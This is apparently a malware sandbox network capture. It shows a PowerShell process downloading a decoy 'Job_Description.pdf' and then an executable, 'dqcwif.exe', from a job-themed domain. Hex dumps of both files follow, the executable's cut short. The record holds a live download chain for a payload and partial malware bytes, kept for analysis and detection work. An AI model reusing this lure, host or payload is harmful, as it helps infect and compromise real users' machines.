                                                                                                        2024-12-23 07:39:19 UTC16384INData Raw: ac 31 01 00 7c 31 01 00 42 31 01 00 16 31 01 00 ec 30 01 00 c0 30 01 00 8e 30 01 00 60 30 01 00 30 30 01 00 fe 2f 01 00 c0 2f 01 00 8e 2f 01 00 6c 2f 01 00 0e 2f 01 00 da 2e 01 00 b6 2e 01 00 90 2e 01 00 48 2e 01 00 f8 2d 01 00 a8 2d 01 00 5a 2d 01 00 26 2d 01 00 f0 2c 01 00 b0 2c 01 00 6a 2c 01 00 40 2c 01 00 1a 2c 01 00 ec 2b 01 00 c0 2b 01 00 78 2b 01 00 48 2b 01 00 20 2b 01 00 e6 2a 01 00 aa 2a 01 00 72 2a 01 00 2c 2a 01 00 fa 29 01 00 a6 29 01 00 7a 29 01 00 4c 29 01 00 1e 29 01 00 f4 28 01 00 b2 28 01 00 56 28 01 00 20 28 01 00 ca 27 01 00 7a 27 01 00 3c 27 01 00 06 27 01 00 d0 26 01 00 7e 26 01 00 4c 26 01 00 22 26 01 00 ee 25 01 00 a8 25 01 00 6a 25 01 00 32 25 01 00 e4 24 01 00 a8 24 01 00 74 24 01 00 3e 24 01 00 08 24 01 00 cc 23 01 00 8e 23 01
                                                                                                        Data Ascii: 1|1B11000`000///l//...H.--Z-&-,,j,@,,++x+H+ +**r*,*))z)L))((V( ('z'<''&~&L&"&%%j%2%$$t$>$$##


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.649734147.45.49.155443672C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-23 07:39:23 UTC88OUTGET /Job_Description.pdf HTTP/1.1
                                                                                                        Host: tiffany-careers.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-23 07:39:24 UTC430INHTTP/1.1 200 OK
                                                                                                        etag: "347816-67604c7c-2538f;;;"
                                                                                                        last-modified: Mon, 16 Dec 2024 15:51:24 GMT
                                                                                                        content-type: application/pdf
                                                                                                        content-length: 3438614
                                                                                                        accept-ranges: bytes
                                                                                                        date: Mon, 23 Dec 2024 07:39:24 GMT
                                                                                                        server: LiteSpeed
                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                        connection: close
                                                                                                        2024-12-23 07:39:24 UTC16384INData Raw: 25 50 44 46 2d 31 2e 36 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 56 65 72 73 69 6f 6e 20 2f 31 2e 36 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 36 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 35 32 36 35 34 39 0a 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0a 2f 46 69 6c 74 65 72 20 2f 44 43 54 44 65 63 6f 64 65 0a 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 0a 2f 57 69 64 74 68 20 32 34 38 30 0a 2f 48 65 69 67 68 74 20 33 35 30 38 0a 2f 43 6f 6c 6f 72 53 70 61 63 65 20 2f 44 65 76 69 63 65 52 47 42 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a ff d8 ff e1 16 2b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07
                                                                                                        Data Ascii: %PDF-1.6%1 0 obj<</Type /Catalog/Version /1.6/Pages 2 0 R>>endobj6 0 obj<</Length 526549/Type /XObject/Subtype /Image/Filter /DCTDecode/BitsPerComponent 8/Width 2480/Height 3508/ColorSpace /DeviceRGB>>stream+ExifMM*
                                                                                                        2024-12-23 07:39:24 UTC16384INData Raw: 2f 70 64 66 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 73 61 76 65 64 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 36 39 35 37 38 37 34 37 33 34 39 30 45 42 31 31 39 36 45 42 45 35 33 46 34 33 36 44 30 45 36 31 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 32 31 2d 30 33 2d 32 39 54 31 30 3a 31 32 3a 35 37 2b 30 38 3a 30 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 73 61 76 65 64 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22
                                                                                                        Data Ascii: /pdf"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:695787473490EB1196EBE53F436D0E61" stEvt:when="2021-03-29T10:12:57+08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="
                                                                                                        2024-12-23 07:39:24 UTC16384INData Raw: bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a b4 71 57 a7 79 06 42 f6 86 bd 8e 2a a5 e7 f8 b9 5b 86 a5 69 df 15 79 aa 74 c5 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 aa d6 30 7a f3 a2 d6 94 61 8a bd ae dc 52 35 1e 0a 31 57 9b fe 63 ff 00 bd f1 ff 00 ab 98 59 b9 bd 57 65 fd 05 8b e5 0e d9 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 aa 65 e5 ef f7 b1 3f d6 c9 c3 9b 8b aa fa 0b d6 ee bf b8 6f f5 4f ea cd 81 78 d8 7d 4f 1a d4 3f bf 6f 99 cd 69 e6 f7 18 be 94 3e 06 c7 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ac ef f2 d2 62 eb 32 f8 66 56 02 f3 fd ab 1a a4 fb ce df f1 c6 ba ff 00 8c 67 32 9e 7d f2 45 bf d8 fa 4f eb c5 55 71 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 55 ad db e6 31 57 d2 5f 93 f7 4b 3e 97 f0 fe c9 a6 2a 92 7e 7a d8 7a b6 e9
                                                                                                        Data Ascii: v*UWb]qWyB*[iytWb]v*UWb0zaR51WcYWeWb]v*Ue?oOx}O?oi>b]v*UWbb2fVg2}EOUqWb]v*UU1W_K>*~zz
                                                                                                        2024-12-23 07:39:25 UTC16384INData Raw: f4 67 72 c6 24 52 8d d0 e6 5b ce be 59 fc c8 d2 9f 4f d6 e7 04 52 22 7e 1c 55 8d 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ad 1f e3 8a be 85 fc 8e ff 00 8e 63 ff 00 ad 8a a4 bf 9f 9d 21 f9 62 af 14 5e 98 ab 78 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 aa eb 5f f7 aa 0f f8 ca bf af 15 7d 87 a7 7f bc d1 7f a8 bf ab 15 79 1f e7 5d 81 37 29 75 4d 82 d2 b9 ae d4 8d ed ed fb 03 27 a4 c5 e6 03 71 98 2f 58 5d 8a 1d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 59 a7 e5 2d 93 5d ea 6d c7 f6 37 39 93 a7 16 5d 1f 6d 64 e0 c7 ef 7b f0 1b 53 36 cf 9c bc 23 f3 7b 46 6b 7d 4c de 81 48 d8 66 ab 51 1a 36 fa 17 62 67 e2 c7 c1 d5 82 66 2b d0 bb 14 3b 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5a 6e 98 a4 3d 9f f2 57 fd e7 97 36 5a 67 87 ed ef a8 3d 22 ea dd 6e 63 68 5f 75 61
                                                                                                        Data Ascii: gr$R[YOR"~Ub]v*UWbc!b^xWb]v*U_}y]7)uM'q/X]v*UWbY-]m79]md{S6#{Fk}LHfQ6bgf+;v*UWbZn=W6Zg="nch_ua
                                                                                                        2024-12-23 07:39:25 UTC16384INData Raw: 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a a1 35 14 aa 72 c5 52 bc 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 aa 2f 4e 4e 4e 4e 2a 99 b7 4c 55 26 b8 fb 67 15 52 c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a a3 f4 bf da c5 51 37 bf dc bf cb 01 6c c7 cc 31 04 e9 98 ee e4 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5c 71 56 43 a1 7f 74 72 e8 ba cd 47 36 b5 df ee f0 49 3a 7e 6c 79 7a 65 4e c9 bc 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 cb f6 97 e6 31 41 e4 cc a3 fb 23 e5 99 0e 90 f3 62 1f 98 76 3c ad be b2 37 2b b6 14 3c e9 7a 0c 55 bc 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 95 fe 5d 59 fa b7 4e ec 3e 10 36 c5 5e 89 77 fd cb ff 00 aa 71 57 8b df ff 00 7e df 33 8a a8 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab
                                                                                                        Data Ascii: b]v*UWb]5rRUWb]v*U/NNNN*LU&gR]v*UWb]Q7l1]v*UWb\qVCtrG6I:~lyzeNUWb]v*U1A#bv<7+<zUUWb]v*U]YN>6^wqW~3b]v*U
                                                                                                        2024-12-23 07:39:25 UTC16384INData Raw: f7 8e 5f f5 0f ea c5 5f 25 6b 7f ef 64 9f eb 1f d7 8a a0 f1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 56 47 f9 77 a0 3e b5 ab 44 14 72 85 0f c7 8a be a6 b6 b7 4b 78 d6 28 c5 15 45 00 c5 52 bf 38 7f c7 26 e7 fe 31 9c af 27 d2 5c ed 0f f7 b1 fe b3 e6 0b 7f b3 f4 9c d2 3e af 2e 6a 98 b0 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 14 b3 ef ca 1f 2d 9b eb c1 a9 30 ac 51 ed f4 e6 5e 9e 16 6d e7 3b 6f 55 e1 c3 c3 fe 29 3d d4 0a 6c 33 68 f9 fb 1b fc c0 d2 ce a3 a4 cd 1a 0a c9 4d b2 9c d1 b8 bb 4e cd cd e1 e5 04 f2 7c e0 62 30 31 85 fe d2 6c 73 4d 54 fa 7d f1 6e 1d 8a 1d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae 38 a5 9d fe 51 68 86 ef 50 6b 87 1f bb e3 99 5a 78 d9 b7 9e ed bd 47 06 3e 11 f5 3f ff d5 f5 26 04 bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a
                                                                                                        Data Ascii: __%kdWb]v*UVGw>DrKx(ER8&1'\>.jv*UWb]-0Q^m;oU)=l3hMN|b01lsMT}nv*UWb8QhPkZxG>?&v*UWb]v*
                                                                                                        2024-12-23 07:39:25 UTC16384INData Raw: 75 46 2a d7 31 e3 8a a2 ad 74 db 9b a2 04 28 58 1e e3 15 67 1e 5c f2 2a c3 49 ee fe 23 d7 8f 86 2a cc e3 8d 63 50 aa 28 06 2a bb 15 76 2a ec 55 8e f9 9f ca a9 aa a9 92 3f 86 50 3a e5 39 31 f1 3b 3d 26 b0 e1 34 7e 97 9b 5f 69 93 d8 b1 49 94 80 3b e6 19 89 0f 51 8f 2c 72 0b 08 50 e0 f4 39 16 ea 75 71 43 75 c5 5d 5c 55 d5 c5 5a 2c 07 53 8a 69 5a da d2 6b a3 c6 05 2d f2 c2 05 b5 ce 62 1c de 83 e5 4f 27 ad a0 17 37 23 93 9d c0 3d b3 2f 1e 3a dc bc de b3 5d c7 e9 8b 2e cc 87 4c a7 70 85 e3 65 1d 48 23 01 65 13 45 e3 9a e5 ab 5a 5d 34 72 75 a9 cd 74 85 17 b7 d3 cf 8e 36 10 55 c8 b7 ba b8 ab ab 8a ba b8 ab ab 8a ba b8 ab ab 8a ba b8 ab ab 8a ad 66 00 6f 8a 40 7a 4f e5 fd b3 c7 03 3b 0a 06 e9 99 98 46 cf 2f da 52 06 54 9b 79 b6 d5 ee f4 bb 88 23 15 77 42 00 cc 87
                                                                                                        Data Ascii: uF*1t(Xg\*I#*cP(*v*U?P:91;=&4~_iI;Q,rP9uqCu]\UZ,SiZk-bO'7#=/:].LpeH#eEZ]4rut6Ufo@zO;F/RTy#wB
                                                                                                        2024-12-23 07:39:25 UTC16384INData Raw: ed 5f 0c 55 e9 56 d7 29 70 82 58 8d 54 f7 c5 55 71 57 62 ae c5 5d 8a b1 bf 31 f9 c2 1d 35 0a c5 f1 c9 d2 83 b6 2a f3 8b fd 56 e3 50 62 d7 0d c8 1e 83 15 42 05 03 a6 2a de 2a ec 55 d8 ab b1 57 62 ad 36 2a f4 3f cb 9f ee a4 c5 59 9e 2a ec 55 a6 60 a0 b3 6c 06 29 02 d8 6f 99 bc ec b0 03 05 a6 ed fc c3 31 a7 96 b9 3b bd 26 83 8b 79 30 3b bb b9 6f 1b 95 c3 72 39 8a 4d bd 0c 20 21 f4 a9 01 4c 0c dd 8a bb 15 76 2a ec 55 d8 ab 47 b7 cf 15 7a c7 93 ff 00 de 31 99 f8 f9 3c 7e bb eb 4f 72 d7 5e c2 7c e7 e6 cf 43 fd 12 d4 fc 47 62 47 6c c6 c9 92 b6 0e f7 41 a3 e2 f5 49 80 92 58 f3 73 56 3d 4e 62 3d 1f 2d 83 b1 57 62 ae c5 5d 8a bb 15 76 2a e2 2b d7 15 4d 34 0d 7e 6d 26 51 43 58 89 dc 65 90 9f 0b 89 a9 d3 0c c3 fa 4f 57 d3 af e3 be 85 67 88 d4 1c ce 89 b7 8f cb 8c e3
                                                                                                        Data Ascii: _UV)pXTUqWb]15*VPbB**UWb6*?Y*U`l)o1;&y0;or9M !Lv*UGz1<~Or^|CGbGlAIXsV=Nb=-Wb]v*+M4~m&QCXeOWg
                                                                                                        2024-12-23 07:39:25 UTC16384INData Raw: ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a
                                                                                                        Data Ascii: UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*
                                                                                                        2024-12-23 07:39:25 UTC16384INData Raw: 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76
                                                                                                        Data Ascii: *UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.649762147.45.49.155443672C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-23 07:39:32 UTC55OUTGET /dqcwif.exe HTTP/1.1
                                                                                                        Host: tiffany-careers.com
                                                                                                        2024-12-23 07:39:33 UTC439INHTTP/1.1 200 OK
                                                                                                        etag: "108a00-675fd924-2538c;;;"
                                                                                                        last-modified: Mon, 16 Dec 2024 07:39:16 GMT
                                                                                                        content-type: application/x-executable
                                                                                                        content-length: 1083904
                                                                                                        accept-ranges: bytes
                                                                                                        date: Mon, 23 Dec 2024 07:39:32 GMT
                                                                                                        server: LiteSpeed
                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                        connection: close
                                                                                                        2024-12-23 07:39:33 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f 31 29 eb 2b 50 47 b8 2b 50 47 b8 2b 50 47 b8 9f cc b6 b8 3e 50 47 b8 9f cc b4 b8 b7 50 47 b8 9f cc b5 b8 0a 50 47 b8 b5 f0 80 b8 2a 50 47 b8 79 38 42 b9 05 50 47 b8 79 38 43 b9 3a 50 47 b8 79 38 44 b9 23 50 47 b8 22 28 c4 b8 23 50 47 b8 22 28 c0 b8 2a 50 47 b8 22 28 d4 b8 0e 50 47 b8 2b 50 46 b8 06 52 47 b8 8e 39 49 b9 7b 50 47 b8 8e 39 44 b9 2a 50 47 b8 8e 39 b8 b8 2a 50 47
                                                                                                        Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$o1)+PG+PG+PG>PGPGPG*PGy8BPGy8C:PGy8D#PG"(#PG"(*PG"(PG+PFRG9I{PG9D*PG9*PG
                                                                                                        2024-12-23 07:39:33 UTC16384INData Raw: c0 48 8d 45 20 48 8b d6 4c 8d 45 28 48 89 44 24 20 e8 5e f5 ff ff 85 c0 0f 88 96 70 04 00 48 8d 4d c0 e8 55 54 00 00 44 8b 45 20 e9 00 ff ff ff 48 8d 0d f9 ba 0e 00 e8 5c 09 00 00 33 c0 4c 8d 5c 24 70 49 8b 5b 30 49 8b 73 38 49 8b e3 41 5f 41 5e 5d c3 48 89 5c 24 08 48 89 7c 24 10 55 48 8b ec 48 83 ec 70 41 8b 18 45 33 db ff cb 44 89 5d c8 4c 8b d1 89 5d b4 49 8b f8 4c 89 5d d0 c7 45 d8 01 00 00 00 41 8b cb 44 89 5d e0 45 8a cb 4c 89 5d e8 c7 45 f0 01 00 00 00 c7 45 b0 02 00 00 00 44 8b 07 41 8b d0 41 8d 40 01 89 07 e8 75 06 00 00 48 85 c0 74 2c 45 84 c9 75 27 48 8b 40 08 48 8b 10 66 44 39 5a 08 75 d7 8b 12 83 ea 0b 74 4f 83 fa 01 75 cb 85 c9 75 42 44 8a ca 44 89 45 b8 eb be 49 8d 8a 68 02 00 00 48 8d 55 b0 e8 98 07 00 00 8d 43 01 48 8d 4d e0 89 07 e8 de
                                                                                                        Data Ascii: HE HLE(HD$ ^pHMUTDE H\3L\$pI[0Is8IA_A^]H\$H|$UHHpAE3D]L]IL]EAD]EL]EEDAA@uHt,Eu'H@HfD9ZutOuuBDDEIhHUCHM
                                                                                                        2024-12-23 07:39:33 UTC16384INData Raw: 84 24 88 00 00 00 89 74 24 50 4d 8b c5 48 89 44 24 48 8b d7 8b 84 24 18 01 00 00 89 44 24 40 8b 84 24 20 01 00 00 89 44 24 38 8b 44 24 60 89 5c 24 30 44 89 74 24 28 89 44 24 20 e8 5c 00 00 00 48 8b b4 24 28 01 00 00 8b d8 48 8b ce e8 8e 87 00 00 48 8b ce c7 46 10 01 00 00 00 89 1e e8 59 73 00 00 85 c0 0f 84 71 49 04 00 83 ff 1d 74 08 49 8b cd e8 ac bf 01 00 45 33 f6 48 8d 4c 24 70 e8 5b 87 00 00 41 8b c6 48 81 c4 c8 00 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 48 8b c4 48 89 58 20 4c 89 40 18 48 89 48 08 55 56 57 41 54 41 55 41 56 41 57 48 8d 68 c1 48 81 ec 90 00 00 00 8b 3d e1 80 0e 00 45 33 ed 41 8b d9 44 8b fa 83 fa 0c 0f 84 33 49 04 00 83 fa 0d 7e 1b 83 fa 0f 0f 8e 25 49 04 00 83 fa 11 0f 84 1c 49 04 00 83 fa 14 0f 84 13 49 04 00 83 ff ff 0f 84 36
                                                                                                        Data Ascii: $t$PMHD$H$D$@$ D$8D$`\$0Dt$(D$ \H$(HHFYsqItIE3HL$p[AHA_A^A]A\_^][HHX L@HHUVWATAUAVAWHhH=E3AD3I~%III6
                                                                                                        2024-12-23 07:39:33 UTC16384INData Raw: c1 89 83 c8 00 00 00 3b 53 1c 0f 8d e6 42 04 00 4c 63 9d 58 01 00 00 41 3b d3 0f 8f eb 42 04 00 8b 43 18 48 8b 7b 10 41 2b c1 49 63 d0 8b 04 87 89 04 97 41 8d 40 01 48 8b 7c 24 48 49 8b d7 48 2b 93 98 00 00 00 48 d1 fa 48 63 c8 48 8b 43 10 89 14 88 8b 95 48 01 00 00 45 3b d8 0f 8f 8e fb ff ff 45 8d 58 02 44 89 9d 58 01 00 00 e9 7e fb ff ff 83 ff 10 0f 85 39 03 00 00 8b 95 48 01 00 00 49 83 c6 06 e9 af fa ff ff 49 83 c6 02 83 c7 ab 49 8b ce 40 f6 c7 01 74 06 41 bd 01 00 00 00 46 0f be 9c 1f f8 80 0c 00 8b c7 48 8d 3d 4e 33 ff ff 44 89 5c 24 58 44 0f be 94 38 e8 80 0c 00 44 89 54 24 50 45 85 d2 75 0c b8 ff ff ff 7f 44 8b d0 89 44 24 50 bf 01 00 00 00 45 0f b7 0e 4c 8d 71 02 44 89 4c 24 54 41 8d 41 f1 83 f8 01 0f 86 da 6d 04 00 48 c7 c0 ff ff ff ff 8b c8 89
                                                                                                        Data Ascii: ;SBLcXA;BCH{A+IcA@H|$HIH+HHcHCHE;EXDX~9HIII@tAFH=N3D\$XD8DT$PEuDD$PELqDL$TAAmH
                                                                                                        2024-12-23 07:39:33 UTC16384INData Raw: 00 00 49 8b 0c df 49 8b d5 e8 16 40 01 00 49 89 3c df 48 ff c3 49 3b de 72 e8 4c 8b 6c 24 48 e9 cf fa ff ff 4c 8d 3d d5 f3 fe ff 49 8b 5c fd 00 48 85 db 74 61 48 8b 73 08 48 85 f6 74 36 48 8b 46 18 ff 08 48 8b 46 18 44 39 30 75 16 48 8b 0e e8 cf 3f 01 00 48 8b 4e 18 ba 04 00 00 00 e8 c1 3f 01 00 ba 20 00 00 00 48 8b ce e8 b4 3f 01 00 4c 89 73 08 8b 43 10 83 f8 05 0f 8d f6 00 00 00 b8 01 00 00 00 44 89 33 48 8b cb 89 43 10 8d 50 17 e8 8e 3f 01 00 4d 89 74 fd 00 48 ff c7 49 3b fc 72 88 e9 62 fa ff ff 44 8b 5c 24 40 45 33 c0 48 8b 9d a8 00 00 00 e9 ac f6 ff ff 41 83 e9 01 0f 88 dd fa ff ff 41 ff c2 41 ff c0 e9 a0 fa ff ff 48 8b 9d b0 00 00 00 48 8b cb c6 00 00 e8 fd 06 00 00 49 8b c7 89 43 10 33 c0 89 03 e9 93 f8 ff ff 49 8b 0a 48 8b 17 48 85 c0 74 20 44 0f
                                                                                                        Data Ascii: II@I<HI;rLl$HL=I\HtaHsHt6HFHFD90uH?HN? H?LsCD3HCP?MtHI;rbD\$@E3HAAAHHIC3IHHt D
                                                                                                        2024-12-23 07:39:33 UTC16384INData Raw: e8 db c7 ff ff 48 8d 15 94 9e 0d 00 49 8b cc e8 dc 05 00 00 c6 44 24 51 00 e9 86 fd ff ff 80 7c 24 51 00 0f 85 89 aa 04 00 49 8b dc e9 93 fd ff ff 44 8b 6c 24 40 4c 8b 64 24 48 4c 8b 74 24 38 4c 89 64 24 58 4c 89 b5 88 00 00 00 45 85 ed 0f 84 c6 b6 04 00 41 83 fd 01 0f 85 d0 b6 04 00 49 8b d6 48 8d 4d 90 48 c7 45 98 00 00 00 00 e8 7d 05 00 00 48 8d 4d 90 e8 3c fe fe ff 84 c0 0f 85 75 02 00 00 83 fb 07 75 62 48 8b 55 78 4d 8b c7 e8 9b 94 00 00 85 c0 0f 88 f3 b8 04 00 83 fb 08 0f 84 a2 b6 04 00 41 83 fd 01 0f 85 b5 b6 04 00 49 8b de 48 8b cb e8 25 c7 ff ff c6 03 00 80 7c 24 34 00 c7 43 10 09 00 00 00 0f 85 ae b6 04 00 80 7d 88 00 0f 84 c6 b6 04 00 b0 01 48 ff cf 88 45 89 48 89 7c 24 78 88 44 24 34 48 8d 4d 90 e8 ec c6 ff ff 48 8b 7d 78 e9 fe ef ff ff 83 f8
                                                                                                        Data Ascii: HID$Q|$QIDl$@Ld$HLt$8Ld$XLEAIHMHE}HM<uubHUxMAIH%|$4C}HEH|$xD$4HMH}x
                                                                                                        2024-12-23 07:39:33 UTC16384INData Raw: 8d 05 6a eb 06 00 48 89 45 f0 48 8d 05 5f fb 09 00 48 89 05 d8 2f 0d 00 48 8d 05 41 ec 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 7a 2f 0d 00 c7 05 5c 2f 0d 00 01 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 d1 04 0a 00 48 89 05 ca 2f 0d 00 48 8d 05 4b f0 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 6c 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f5 05 0a 00 48 89 05 c6 2f 0d 00 48 8d 05 c7 f1 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 68 2f 0d 00 66 c7 05 ff 2e 0d 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 b8 ef 09 00 48 89 05 b9 2f 0d 00 48 8d 05 fe f3 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 5b 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f4 05 0a 00 48 c7 45 f8 00 00 00 00 0f 11 05 65 2f 0d 00 48 89 05 a6 2f 0d 00 48 8d 05 bb 5a 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 a0 f7 09
                                                                                                        Data Ascii: jHEH_H/HAHEz/\/EHEHH/HKHE)l/EHEHH/HHEh/f.EHEHH/HHE)[/EHEHHEe/H/HZEHEH
                                                                                                        2024-12-23 07:39:33 UTC16384INData Raw: 00 c7 05 89 12 0d 00 02 00 00 00 66 c7 05 84 12 0d 00 00 00 c7 05 9a 12 0d 00 02 00 00 00 c7 05 94 12 0d 00 02 00 00 00 66 c7 05 8f 12 0d 00 00 00 c7 05 a5 12 0d 00 02 00 00 00 c7 05 9f 12 0d 00 03 00 00 00 66 c7 05 9a 12 0d 00 00 00 c7 05 b0 12 0d 00 01 00 00 00 c7 05 aa 12 0d 00 01 00 00 00 66 c7 05 a5 12 0d 00 00 00 48 89 05 a6 12 0d 00 48 c7 45 f8 00 00 00 00 48 8d 05 73 6a 08 00 48 89 45 f0 48 8d 05 d4 a4 09 00 0f 10 45 f0 48 89 05 a9 12 0d 00 48 8d 05 72 6c 08 00 48 89 45 f0 48 8d 05 17 b0 09 00 48 89 05 b8 12 0d 00 48 8d 05 99 6e 08 00 48 c7 45 f8 00 00 00 00 0f 29 05 5a 12 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 8b b1 09 00 48 89 05 b4 12 0d 00 48 8d 05 81 ab fe ff 48 